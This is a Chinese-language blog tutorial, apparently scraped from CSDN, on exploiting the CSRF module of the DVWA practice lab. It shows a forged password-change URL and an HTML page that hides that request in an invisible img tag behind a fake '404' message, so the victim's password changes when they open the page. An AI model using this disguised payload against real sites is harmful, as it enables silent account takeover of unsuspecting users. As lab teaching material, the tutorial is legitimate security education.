当前位置:网站首页>DVWA系列——CSRF
DVWA系列——CSRF
2022-04-22 01:10:00 【小王先森&】
DVWA系列——CSRF
CSRF跨站伪造请求介绍
CSRF,全称Cross-site request forgery, 翻译过来就是跨站请求伪造,是指利用受害者尚未失 效的身份认证信息(cookie、 会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作 (如转账、改密等)。CSRF 与XSS最大的区别就在于,CSRF并没有盗取ookie而是直接利用
漏洞利用
打开NVWA这里CSRF是一个修改密码的界面
在修改密码时观察url

http://192.168.19.139:89/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#
我们可以通过修改url中的密码和确认密码达到修改密码的目的
再那边cookie没有过期时就可以直接在浏览器用url修改密码这里我们修改为123


退出登录重新用123登录
这里介绍一下比较高级的方法
我们可以直接把恶意url写在一个恶意页面里写一个html
<html>
<head>
</head>
<body>
<img src="http://192.168.19.139:89/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#" border="0" style="display":none;"/>
<h1>404<h1>
<h2>file not found.<h2>
</body>
</html>
用img隐藏url当用户打开这个页面就执行恶意url

版权声明
本文为[小王先森&]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_49340699/article/details/109822631
边栏推荐
猜你喜欢

In 2022, crud alone can't meet the interview and upgrading notes of large factories in spring recruitment

Ma Qianli, vice president of Babbitt: the rise of NPC in the era of meta universe, digital identity protocol may become an import-level product - 2022 yuan universe cloud Summit

如果在安装 32 位 Oracle 客户端组件的情况下以 64 位模式运行,将出现此问题

为什么PR导出来的视频,偏紫色?

Embedded GUI inventory - how many do you know?

作文以记之 ~ 二叉树的中序遍历
![[PRANET] paper code interpretation (loss function) - Blank](/img/86/f365b813f85efc820076e05d1cbb3e.png)
[PRANET] paper code interpretation (loss function) - Blank

SQL Server 2008 uses over (partition by.. order by..) Syntax error displayed

【Pranet】论文及代码解读(ResNet部分)——jialiang nie

【Pranet】论文及代码解读(RFB与aggregation部分)——Cavy岚
随机推荐
使用多个可选过滤器过滤 Eloquent 模型
Solve the problem that the idea web project does not have small blue dots
2022年春招大厂面试升级笔记,光CRUD已经不能满足了
R language ggplot2 visualizes scatter plot, highlights the specified data points based on combination rules, sets the size and color of data points
Blazor University (12)组件 — 组件生命周期
A bug with a probability of occurrence less than one in ten thousand was captured
R language generalized linear model function GLM, generalized linear models and GLM function to build logistic regression model
PR如何对裁剪之后的视频进行resize,指定到期望大小?
[PRANET] thesis and code interpretation (res2net part) -- Peiheng Jia
Boutique: thousand word long text teaches you to use byte beating volcanic engine imagex
April 21, 2022, day 14
Several schemes of single USB to multi serial port
R language uses lmperm package to apply to the replacement method of linear model (replacement test, permutation tests), one-way covariance analysis (one-way ANCOVA) on the same data set, and one-way
Flash basic code
Use of Prometheus
Rpcx source code learning - server side
kubernetes+prometheus+grafana
(9) The edit of jvcl is combined with opening file, opening directory, selecting time, button, calculator and IP address
Ma Qianli, vice president of Babbitt: the rise of NPC in the era of meta universe, digital identity protocol may become an import-level product - 2022 yuan universe cloud Summit
Matlab: simulate the control system and use ode45 to solve the LC circuit